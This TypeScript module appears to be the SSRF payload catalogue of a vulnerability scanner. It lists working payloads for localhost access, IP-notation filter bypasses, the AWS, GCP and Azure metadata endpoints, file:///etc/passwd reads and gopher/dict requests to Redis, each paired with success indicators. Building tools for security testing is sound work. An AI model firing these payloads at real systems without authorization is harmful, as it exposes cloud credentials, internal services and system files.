import { Payload, PayloadSet, generatePayloadId } from "./payload-types";

const localhostPayloads: Payload[] = [
  {
    id: generatePayloadId("ssrf", "blind", 1),
    category: "ssrf",
    technique: "blind",
    riskLevel: "safe",
    value: "http://127.0.0.1",
    description: "Basic localhost SSRF",
    expectedBehavior: "Access to internal localhost service",
    successIndicators: [
      "html",
      "<!DOCTYPE",
      "nginx",
      "apache",
    ],
    failureIndicators: [
      "blocked",
      "not allowed",
    ],
    applicableContexts: ["url_param", "body_param"],
    encoding: "none",
  },
  {
    id: generatePayloadId("ssrf", "blind", 2),
    category: "ssrf",
    technique: "blind",
    riskLevel: "safe",
    value: "http://localhost",
    description: "Localhost hostname SSRF",
    expectedBehavior: "Access to internal localhost service",
    successIndicators: [
      "html",
    ],
    failureIndicators: [
      "blocked",
    ],
    applicableContexts: ["url_param", "body_param"],
    encoding: "none",
  },
  {
    id: generatePayloadId("ssrf", "blind", 3),
    category: "ssrf",
    technique: "blind",
    riskLevel: "safe",
    value: "http://0.0.0.0",
    description: "Zero IP SSRF",
    expectedBehavior: "Access to any local interface",
    successIndicators: [],
    failureIndicators: [],
    applicableContexts: ["url_param", "body_param"],
    encoding: "none",
  },
  {
    id: generatePayloadId("ssrf", "blind", 4),
    category: "ssrf",
    technique: "blind",
    riskLevel: "safe",
    value: "http://[::1]",
    description: "IPv6 localhost SSRF",
    expectedBehavior: "Access via IPv6 localhost",
    successIndicators: [],
    failureIndicators: [],
    applicableContexts: ["url_param", "body_param"],
    encoding: "none",
  },
];

const bypassPayloads: Payload[] = [
  {
    id: generatePayloadId("ssrf", "blind", 10),
    category: "ssrf",
    technique: "blind",
    riskLevel: "safe",
    value: "http://2130706433",
    description: "Decimal IP for 127.0.0.1",
    expectedBehavior: "Filter bypass via decimal notation",
    successIndicators: [],
    failureIndicators: [],
    applicableContexts: ["url_param", "body_param"],
    encoding: "none",
  },
  {
    id: generatePayloadId("ssrf", "blind", 11),
    category: "ssrf",
    technique: "blind",
    riskLevel: "safe",
    value: "http://0x7f000001",
    description: "Hex IP for 127.0.0.1",
    expectedBehavior: "Filter bypass via hex notation",
    successIndicators: [],
    failureIndicators: [],
    applicableContexts: ["url_param", "body_param"],
    encoding: "none",
  },
  {
    id: generatePayloadId("ssrf", "blind", 12),
    category: "ssrf",
    technique: "blind",
    riskLevel: "safe",
    value: "http://017700000001",
    description: "Octal IP for 127.0.0.1",
    expectedBehavior: "Filter bypass via octal notation",
    successIndicators: [],
    failureIndicators: [],
    applicableContexts: ["url_param", "body_param"],
    encoding: "none",
  },
  {
    id: generatePayloadId("ssrf", "blind", 13),
    category: "ssrf",
    technique: "blind",
    riskLevel: "safe",
    value: "http://127.1",
    description: "Short IP notation",
    expectedBehavior: "Browser expands to 127.0.0.1",
    successIndicators: [],
    failureIndicators: [],
    applicableContexts: ["url_param", "body_param"],
    encoding: "none",
  },
  {
    id: generatePayloadId("ssrf", "blind", 14),
    category: "ssrf",
    technique: "blind",
    riskLevel: "safe",
    value: "http://127.0.0.1.nip.io",
    description: "DNS rebinding with nip.io",
    expectedBehavior: "Domain resolves to localhost",
    successIndicators: [],
    failureIndicators: [],
    applicableContexts: ["url_param", "body_param"],
    encoding: "none",
  },
];

const cloudMetadataPayloads: Payload[] = [
  {
    id: generatePayloadId("ssrf", "blind", 20),
    category: "ssrf",
    technique: "blind",
    riskLevel: "safe",
    value: "http://169.254.169.254/latest/meta-data/",
    description: "AWS EC2 metadata endpoint",
    expectedBehavior: "Access to AWS instance metadata",
    successIndicators: [
      "ami-id",
      "instance-id",
      "public-hostname",
      "iam",
    ],
    failureIndicators: [
      "blocked",
      "not found",
    ],
    applicableContexts: ["url_param", "body_param"],
    encoding: "none",
  },
  {
    id: generatePayloadId("ssrf", "blind", 21),
    category: "ssrf",
    technique: "blind",
    riskLevel: "safe",
    value: "http://169.254.169.254/latest/user-data",
    description: "AWS EC2 user-data endpoint",
    expectedBehavior: "Access to instance user-data",
    successIndicators: [],
    failureIndicators: [],
    applicableContexts: ["url_param", "body_param"],
    encoding: "none",
  },
  {
    id: generatePayloadId("ssrf", "blind", 22),
    category: "ssrf",
    technique: "blind",
    riskLevel: "safe",
    value: "http://metadata.google.internal/computeMetadata/v1/",
    description: "GCP metadata endpoint",
    expectedBehavior: "Access to GCP instance metadata",
    successIndicators: [
      "project",
      "instance",
      "zone",
    ],
    failureIndicators: [],
    applicableContexts: ["url_param", "body_param"],
    encoding: "none",
  },
  {
    id: generatePayloadId("ssrf", "blind", 23),
    category: "ssrf",
    technique: "blind",
    riskLevel: "safe",
    value: "http://169.254.169.254/metadata/instance",
    description: "Azure metadata endpoint",
    expectedBehavior: "Access to Azure instance metadata",
    successIndicators: [
      "compute",
      "network",
    ],
    failureIndicators: [],
    applicableContexts: ["url_param", "body_param"],
    encoding: "none",
  },
];

const protocolPayloads: Payload[] = [
  {
    id: generatePayloadId("ssrf", "blind", 30),
    category: "ssrf",
    technique: "blind",
    riskLevel: "low",
    value: "file:///etc/passwd",
    description: "File protocol SSRF",
    expectedBehavior: "Local file read via file protocol",
    successIndicators: [
      "root:",
    ],
    failureIndicators: [],
    applicableContexts: ["url_param", "body_param"],
    encoding: "none",
  },
  {
    id: generatePayloadId("ssrf", "blind", 31),
    category: "ssrf",
    technique: "blind",
    riskLevel: "low",
    value: "gopher://127.0.0.1:6379/_INFO",
    description: "Gopher protocol to Redis",
    expectedBehavior: "Interaction with Redis service",
    successIndicators: [
      "redis",
    ],
    failureIndicators: [],
    applicableContexts: ["url_param", "body_param"],
    encoding: "none",
  },
  {
    id: generatePayloadId("ssrf", "blind", 32),
    category: "ssrf",
    technique: "blind",
    riskLevel: "low",
    value: "dict://127.0.0.1:6379/INFO",
    description: "Dict protocol to Redis",
    expectedBehavior: "Interaction with Redis service",
    successIndicators: [],
    failureIndicators: [],
    applicableContexts: ["url_param", "body_param"],
    encoding: "none",
  },
];

export const ssrfPayloadSet: PayloadSet = {
  category: "ssrf",
  name: "Server-Side Request Forgery Payloads",
  description: "SSRF payloads for internal service access and cloud metadata endpoints",
  payloads: [
    ...localhostPayloads,
    ...bypassPayloads,
    ...cloudMetadataPayloads,
    ...protocolPayloads,
  ],
};

export function getSsrfPayloads(): Payload[] {
  return ssrfPayloadSet.payloads;
}

export function getCloudMetadataPayloads(): Payload[] {
  return cloudMetadataPayloads;
}
